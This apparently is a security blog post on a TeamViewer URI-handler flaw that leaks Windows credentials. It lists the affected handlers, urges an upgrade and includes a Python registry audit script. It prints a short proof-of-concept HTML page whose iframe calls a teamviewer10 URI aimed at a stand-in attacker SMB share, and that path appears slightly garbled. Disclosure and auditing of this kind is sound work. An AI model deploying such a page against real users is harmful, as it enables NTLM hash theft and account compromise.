Hey Everyone,
Vulnerabilities in remote desktop applications are becoming routine these days. This time it is TeamViewer.
A warning to TeamViewer users: a severe vulnerability in the application puts you at risk.
Wondering what TeamViewer is? It is a popular remote desktop application that lets you share your screen and, with consent, hand over control so that specific actions can be performed from anywhere in the world.
TeamViewer is available for desktop and mobile operating systems such as Windows, macOS, Linux, Chrome OS, iOS, Android and BlackBerry.
Think about it: what if someone takes over your PC without your consent? That's something to worry about, right?
Security engineer Jeffrey Hofmann of Praetorian has reported a high-risk vulnerability in TeamViewer's custom URI handlers that lets an attacker force the application to relay an NTLM authentication request to the attacker's system.
The attacker doesn't need much effort to interact with the victim's machine; they just need to convince the victim to visit a malicious web page once. Threat actors could then steal your system password and eventually compromise the system.
The attacker can gain a remote connection by using the web page to trick the application through TeamViewer's URI scheme.
The code looks like this:
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="description" content="Cat Images">
<meta name="author" content="hacker">
<link rel="stylesheet" href="css/styles.css">
</head>
<body>
<iframe src='teamviewer10: –play \attacker-IPsharefake.tvs'></iframe>
</body>
</html>
Visiting the attacker's malicious web page triggers the SMB authentication attack and leaks the system username and NTLMv2-hashed password to the attacker, who can then use them to authenticate.
The vulnerability is categorized as an 'Unquoted URI Handler' and, according to Hofmann, affects the following URI handlers: teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1.
It is not being exploited in the wild as of now, but that may happen in the future, so users are strongly advised to upgrade their software to 15.8.3.
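One way to audit a Windows host for the 'Unquoted URI Handler' condition is to check whether the %1 placeholder in each handler's registered command line sits inside double quotes. The script below is an added example, not code from Hofmann's report or from TeamViewer; the sample command lines and install path are constructed, and the quote check is a simplification that ignores backslash-escaped quotes.

```python
import re
import sys

# URI schemes named on this page as affected.
SCHEMES = ["teamviewer10", "teamviewer8", "teamviewerapi", "tvchat1",
           "tvcontrol1", "tvfiletransfer1", "tvjoinv8", "tvpresent1",
           "tvsendfile1", "tvsqcustomer1", "tvsqsupport1", "tvvideocall1",
           "tvvpn1"]

def placeholder_quoted(command):
    """True if every %1 sits inside double quotes, False if any does not,
    None if the command line has no %1 placeholder at all."""
    hits = list(re.finditer(r"%1", command))
    if not hits:
        return None
    for m in hits:
        # An odd count of '"' before %1 means a quoted string is open there.
        inside = command[:m.start()].count('"') % 2 == 1
        closed = '"' in command[m.end():]
        if not (inside and closed):
            return False
    return True

def audit(commands):
    """Map each scheme to 'quoted', 'UNQUOTED' or 'no-placeholder'."""
    labels = {None: "no-placeholder", True: "quoted", False: "UNQUOTED"}
    return {s: labels[placeholder_quoted(c)] for s, c in commands.items()}

def read_registered(schemes=SCHEMES):
    """Windows only: default value of HKCR\\<scheme>\\shell\\open\\command."""
    import winreg
    found = {}
    for s in schemes:
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT,
                                s + r"\shell\open\command") as key:
                found[s] = winreg.QueryValueEx(key, "")[0]
        except OSError:
            pass  # handler not registered on this machine
    return found

# Constructed sample command lines (illustrative path, not read from a host).
SAMPLE = {
    "teamviewer10": r'"C:\Program Files (x86)\TeamViewer\TeamViewer.exe" %1',
    "tvvpn1": r'"C:\Program Files (x86)\TeamViewer\TeamViewer.exe" "%1"',
}

if __name__ == "__main__":
    data = read_registered() if sys.platform == "win32" else SAMPLE
    for scheme, verdict in sorted(audit(data).items()):
        print(f"{scheme:16} {verdict}")
```

A handler reported as UNQUOTED passes the text after the scheme to the application as separate command-line arguments, which is the condition the page describes.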
A similar issue was found in the Zoom video conferencing application too.
Hope everyone upgrades to the latest version and stays safe and secure.
Thank you.
Author: Sam Nivethan V J
Security Analyst & Trainer